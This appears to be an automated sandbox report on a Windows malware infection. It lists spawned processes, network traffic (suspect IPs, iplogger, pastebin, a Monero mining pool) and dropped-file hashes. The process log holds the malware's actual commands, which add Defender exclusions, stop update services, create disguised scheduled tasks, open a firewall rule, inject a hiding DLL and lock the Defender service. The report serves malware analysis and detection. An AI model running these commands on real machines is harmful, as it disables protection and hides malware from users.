"C:\Windows\system32\schtasks.exe" /Delete /F /TN "HAC1030-3"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5472 -ip 5472

C:\Users\Admin\AppData\Local\Temp\799B.exe

C:\Users\Admin\AppData\Local\Temp\799B.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5472 -s 784

C:\Users\Admin\AppData\Local\Temp\7FE5.exe

C:\Users\Admin\AppData\Local\Temp\7FE5.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 8920 -ip 8920

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8920 -s 572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9568 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10256 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=9980 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7092 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
RU 193.233.255.73:80 193.233.255.73 tcp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.247.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 steamcommunity.com udp
JP 23.207.106.113:443 steamcommunity.com tcp
US 8.8.8.8:53 www.epicgames.com udp
US 8.8.8.8:53 store.steampowered.com udp
US 18.235.28.127:443 www.epicgames.com tcp
NL 104.85.0.101:443 store.steampowered.com tcp
US 8.8.8.8:53 twitter.com udp
US 104.244.42.1:443 twitter.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 113.106.207.23.in-addr.arpa udp
US 8.8.8.8:53 101.0.85.104.in-addr.arpa udp
US 8.8.8.8:53 127.28.235.18.in-addr.arpa udp
US 8.8.8.8:53 1.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 130.47.239.18.in-addr.arpa udp
US 8.8.8.8:53 abs.twimg.com udp
US 8.8.8.8:53 api.twitter.com udp
US 8.8.8.8:53 pbs.twimg.com udp
US 8.8.8.8:53 static.ads-twitter.com udp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 104.244.42.194:443 api.twitter.com tcp
NL 199.232.148.159:443 pbs.twimg.com tcp
NL 199.232.148.157:443 static.ads-twitter.com tcp
US 8.8.8.8:53 www.paypal.com udp
US 152.199.21.141:443 abs.twimg.com tcp
US 8.8.8.8:53 video.twimg.com udp
US 8.8.8.8:53 t.co udp
US 151.101.1.21:443 www.paypal.com tcp
NL 199.232.148.158:443 video.twimg.com tcp
US 104.244.42.5:443 t.co tcp
US 8.8.8.8:53 www.paypalobjects.com udp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 8.8.8.8:53 141.21.199.152.in-addr.arpa udp
US 8.8.8.8:53 194.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 159.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 157.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 158.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 5.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 25.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 store.akamai.steamstatic.com udp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.169:80 apps.identrust.com tcp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 169.25.221.88.in-addr.arpa udp
US 8.8.8.8:53 tracking.epicgames.com udp
US 8.8.8.8:53 static-assets-prod.unrealengine.com udp
US 3.93.123.75:443 tracking.epicgames.com tcp
US 18.239.36.103:443 static-assets-prod.unrealengine.com tcp
US 18.239.36.103:443 static-assets-prod.unrealengine.com tcp
US 8.8.8.8:53 i.ytimg.com udp
NL 216.58.214.22:443 i.ytimg.com tcp
US 8.8.8.8:53 22.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 75.123.93.3.in-addr.arpa udp
US 8.8.8.8:53 103.36.239.18.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 192.229.221.25:443 www.paypalobjects.com tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 www.recaptcha.net udp
NL 172.217.168.227:443 www.recaptcha.net tcp
NL 172.217.168.227:443 www.recaptcha.net udp
US 8.8.8.8:53 community.akamai.steamstatic.com udp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
US 8.8.8.8:53 227.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 169.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
IE 163.70.151.35:443 facebook.com tcp
US 8.8.8.8:53 zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com udp
US 104.17.209.240:443 zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com tcp
US 8.8.8.8:53 fbcdn.net udp
IE 163.70.151.35:443 fbcdn.net tcp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 240.209.17.104.in-addr.arpa udp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 play.google.com udp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 t.paypal.com udp
US 151.101.1.35:443 t.paypal.com tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 35.1.101.151.in-addr.arpa udp
RU 193.233.255.73:80 193.233.255.73 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
NL 194.169.175.118:80 194.169.175.118 tcp
US 8.8.8.8:53 118.175.169.194.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
NL 104.85.0.101:443 store.steampowered.com tcp
JP 23.207.106.113:443 steamcommunity.com tcp
FI 77.91.124.86:19084 tcp
NL 216.58.214.22:443 i.ytimg.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.251.36.2:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 2.36.251.142.in-addr.arpa udp
NL 142.251.36.2:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 rr4---sn-q4fl6n6d.googlevideo.com udp
US 173.194.57.201:443 rr4---sn-q4fl6n6d.googlevideo.com tcp
US 173.194.57.201:443 rr4---sn-q4fl6n6d.googlevideo.com tcp
US 8.8.8.8:53 201.57.194.173.in-addr.arpa udp
US 173.194.57.201:443 rr4---sn-q4fl6n6d.googlevideo.com tcp
US 173.194.57.201:443 rr4---sn-q4fl6n6d.googlevideo.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.71:4341 tcp
US 8.8.8.8:53 yt3.ggpht.com udp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
US 173.194.57.201:443 rr4---sn-q4fl6n6d.googlevideo.com tcp
US 173.194.57.201:443 rr4---sn-q4fl6n6d.googlevideo.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com udp
US 8.8.8.8:53 i3.ytimg.com udp
GB 216.58.208.110:443 i3.ytimg.com tcp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 110.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 stim.graspalace.com udp
US 188.114.96.0:80 stim.graspalace.com tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
BG 171.22.28.213:80 171.22.28.213 tcp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
NL 172.217.168.202:443 jnn-pa.googleapis.com tcp
US 8.8.8.8:53 static.doubleclick.net udp
NL 142.251.36.6:443 static.doubleclick.net tcp
NL 172.217.168.202:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
US 8.8.8.8:53 202.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 6.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 youtube.com udp
NL 142.250.179.142:443 youtube.com tcp
US 8.8.8.8:53 142.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 rr2---sn-4g5edndd.googlevideo.com udp
DE 172.217.133.167:443 rr2---sn-4g5edndd.googlevideo.com tcp
DE 172.217.133.167:443 rr2---sn-4g5edndd.googlevideo.com tcp
DE 172.217.133.167:443 rr2---sn-4g5edndd.googlevideo.com udp
US 149.40.62.171:15666 tcp
US 8.8.8.8:53 167.133.217.172.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 64.185.227.156:443 api.ipify.org tcp
US 8.8.8.8:53 171.62.40.149.in-addr.arpa udp
US 8.8.8.8:53 156.227.185.64.in-addr.arpa udp
IT 185.196.9.171:80 185.196.9.171 tcp
US 8.8.8.8:53 171.9.196.185.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 194.49.94.11:80 194.49.94.11 tcp
US 8.8.8.8:53 11.94.49.194.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 rr1---sn-4g5edndr.googlevideo.com udp
DE 172.217.133.230:443 rr1---sn-4g5edndr.googlevideo.com udp
US 8.8.8.8:53 230.133.217.172.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 api.ip.sb udp
US 172.67.75.172:443 api.ip.sb tcp
US 8.8.8.8:53 172.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 api.steampowered.com udp
US 8.8.8.8:53 login.steampowered.com udp
JP 23.207.106.113:443 login.steampowered.com tcp
JP 23.207.106.113:443 login.steampowered.com tcp
US 8.8.8.8:53 community.akamai.steamstatic.com udp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
US 8.8.8.8:53 160.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 www.paypal.com udp
US 8.8.8.8:53 www.recaptcha.net udp
NL 172.217.168.227:443 www.recaptcha.net udp
NL 172.217.168.227:443 www.recaptcha.net tcp
FI 77.91.124.86:19084 tcp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 accounts.google.com udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
US 8.8.8.8:53 i.ytimg.com udp
US 8.8.8.8:53 rr2---sn-4g5edndd.googlevideo.com udp
NL 216.58.214.22:443 i.ytimg.com udp
DE 172.217.133.167:443 rr2---sn-4g5edndd.googlevideo.com udp
US 8.8.8.8:53 28.26.214.95.in-addr.arpa udp
US 8.8.8.8:53 035f6000-c417-401a-91c7-4fe210898f01.uuid.statsexplorer.org udp
US 8.8.8.8:53 static-assets-prod.unrealengine.com udp
US 18.239.36.105:443 static-assets-prod.unrealengine.com tcp
US 8.8.8.8:53 98.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 105.36.239.18.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 stun2.l.google.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 server9.statsexplorer.org udp
BG 185.82.216.108:443 server9.statsexplorer.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
IN 172.253.121.127:19302 stun2.l.google.com udp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.96.0:443 walkinglate.com tcp
FR 163.172.154.142:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 108.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 127.121.253.172.in-addr.arpa udp
US 8.8.8.8:53 142.154.172.163.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
FR 163.172.154.142:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
US 8.8.8.8:53 talon-website-prod.ecosec.on.epicgames.com udp
US 172.64.146.120:443 talon-website-prod.ecosec.on.epicgames.com tcp
US 8.8.8.8:53 120.146.64.172.in-addr.arpa udp
US 8.8.8.8:53 api.twitter.com udp
US 104.244.42.2:443 api.twitter.com tcp
US 104.244.42.2:443 api.twitter.com tcp
US 104.244.42.2:443 api.twitter.com tcp
US 104.244.42.2:443 api.twitter.com tcp
US 104.244.42.2:443 api.twitter.com tcp
BG 185.82.216.108:443 server9.statsexplorer.org tcp
US 8.8.8.8:53 2.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 rr1---sn-4g5edndr.googlevideo.com udp
DE 172.217.133.230:443 rr1---sn-4g5edndr.googlevideo.com udp
US 8.8.8.8:53 abs.twimg.com udp
US 152.199.21.141:443 abs.twimg.com tcp
US 8.8.8.8:53 sentry.io udp
US 35.186.247.156:443 sentry.io tcp
US 8.8.8.8:53 156.247.186.35.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 63.141.182.52.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 talon-service-prod.ecosec.on.epicgames.com udp
US 172.64.146.120:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 172.64.146.120:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 172.64.146.120:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 8.8.8.8:53 js.hcaptcha.com udp
US 104.19.219.90:443 js.hcaptcha.com tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 90.219.19.104.in-addr.arpa udp
US 8.8.8.8:53 www.epicgames.com udp
US 8.8.8.8:53 newassets.hcaptcha.com udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe

MD5 4e3f52f537fb3b61b27a53a2d12b4390
SHA1 1f0b873c81551fbfb99c0cc2a6c1f8589ec2ebd1
SHA256 e23562e2812c112ceab2d3f2e5c01b65b0a65a7c8e2e7f5b38a5456dea84244d
SHA512 5ec05dbe676cde9d2c4fe27d9aa76c9fca065ad328872d216b037273cc69f0e036cd4578856c46ffadb580ae4a55845eaffcd59b9116984091be282909888a6b

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe

MD5 4e3f52f537fb3b61b27a53a2d12b4390
SHA1 1f0b873c81551fbfb99c0cc2a6c1f8589ec2ebd1
SHA256 e23562e2812c112ceab2d3f2e5c01b65b0a65a7c8e2e7f5b38a5456dea84244d
SHA512 5ec05dbe676cde9d2c4fe27d9aa76c9fca065ad328872d216b037273cc69f0e036cd4578856c46ffadb580ae4a55845eaffcd59b9116984091be282909888a6b

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe

MD5 0166fac6c7afef4210abcfd75a1e2bb6
SHA1 ddca5e7bb1e3921a06a9aceede2cfbea14c8353d
SHA256 90640736b9f91a90e0cb5fdc6e10ea9d0a3651de0017db8ede73e5bed05f7484
SHA512 5e6b6382ee730875ba7497554a74436852d5e90789b6ca0a9d160f87c2819b5e9ce6fd4a06cbcf64e7e4627fe94212a8ca571ccc20f6c2ef88fb5a3be46bd67d

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe

MD5 0166fac6c7afef4210abcfd75a1e2bb6
SHA1 ddca5e7bb1e3921a06a9aceede2cfbea14c8353d
SHA256 90640736b9f91a90e0cb5fdc6e10ea9d0a3651de0017db8ede73e5bed05f7484
SHA512 5e6b6382ee730875ba7497554a74436852d5e90789b6ca0a9d160f87c2819b5e9ce6fd4a06cbcf64e7e4627fe94212a8ca571ccc20f6c2ef88fb5a3be46bd67d

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe

MD5 b064122cc1b9ffa89a87e44d074331df
SHA1 5853ec84100b4b1ffe7ca69a233660f2db88f57d
SHA256 c140730c6283ddbc40e999d7e084d340f3fa497ff28fa5bc588087701d5edd58
SHA512 e815c5ed7d2df4c40906d232366ee2bcc5ddd312177c15f7213a8cf1c925a181b273ab3579ebe919b56e28afc22bb3a2b75f625fbbc75f38459d5c6f4dd679fb

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe

MD5 b064122cc1b9ffa89a87e44d074331df
SHA1 5853ec84100b4b1ffe7ca69a233660f2db88f57d
SHA256 c140730c6283ddbc40e999d7e084d340f3fa497ff28fa5bc588087701d5edd58
SHA512 e815c5ed7d2df4c40906d232366ee2bcc5ddd312177c15f7213a8cf1c925a181b273ab3579ebe919b56e28afc22bb3a2b75f625fbbc75f38459d5c6f4dd679fb

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe

MD5 754cdd0f6a174c759df63315fe2011a0
SHA1 f997e46f11ecea34ad067b9cbcdee13659c9289f
SHA256 af8c3a04e41e89acce8389a3f2afc1200c0b78aa2a52a2bf4673825fedff7957
SHA512 c784bbbf7f9140d609dd984646633be5a97b649220998d6f373ee7f91e7a6cdc68f2d8ed329c906fbc258bc03466440688a0a8fa90ee43835b9402bc3459bc07

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe

MD5 754cdd0f6a174c759df63315fe2011a0
